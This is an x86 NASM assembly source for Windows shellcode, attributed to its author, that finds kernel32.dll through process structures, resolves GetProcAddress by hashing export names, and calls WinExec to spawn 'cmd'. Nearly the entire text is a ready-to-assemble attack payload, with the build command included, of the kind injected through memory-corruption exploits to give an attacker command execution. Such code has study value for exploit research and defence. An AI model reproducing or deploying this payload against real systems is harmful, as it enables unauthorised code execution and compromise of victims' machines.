;Platform independent WinExec CMD spawning ShellCode ;nasm -f bin -o winexec.s winexec.asm ;Written by Pranay Kanwar bits 32 sub sp,40 ; reserve space on stack mov esi,esp ; make esi our stack pointer call FK32 ;find kernel32.dll base address mov [esi],eax ;Move it on stack mov ebx, [esi] ;push the address push ebx mov ebx,0x0e8afe98 ;GetProcAddress hash push ebx call LGetProcAddress mov [esi+4],eax xor ebx,ebx inc ebx push ebx mov dword [esi+8],0x020646d63 ; cmd , we don't need trailing .exe lea ebx,[esi+8] push ebx call [esi+4]; jmp TheEnd FK32: push esi xor esi, esi mov esi,[fs:esi + 0x18] lodsd lodsd mov eax,[eax - 0x1c] __loop: dec eax xor ax, ax cmp word [eax], 0x5a4d jne __loop pop esi ret 4 LGetProcAddress: push ebx push ebp push esi push edi mov ebp, [esp + 24] mov eax, [ebp + 0x3c] mov edx, [ebp + eax + 120] add edx, ebp mov ecx, [edx + 24] mov ebx, [edx + 32] add ebx, ebp LFnlp: jecxz LNtfnd dec ecx mov esi, [ebx + ecx * 4] add esi, ebp xor edi, edi cld LHshlp: xor eax, eax lodsb cmp al, ah je LFnd ror edi, 13 add edi, eax jmp short LHshlp LFnd: cmp edi, [esp + 20] jnz LFnlp mov ebx, [edx + 36] add ebx, ebp mov cx, [ebx + 2 * ecx] mov ebx, [edx + 28] add ebx, ebp mov eax, [ebx + 4 * ecx] add eax, ebp jmp short LDone LNtfnd: xor eax, eax LDone: mov edx, ebp pop edi pop esi pop ebp pop ebx ret 4 TheEnd: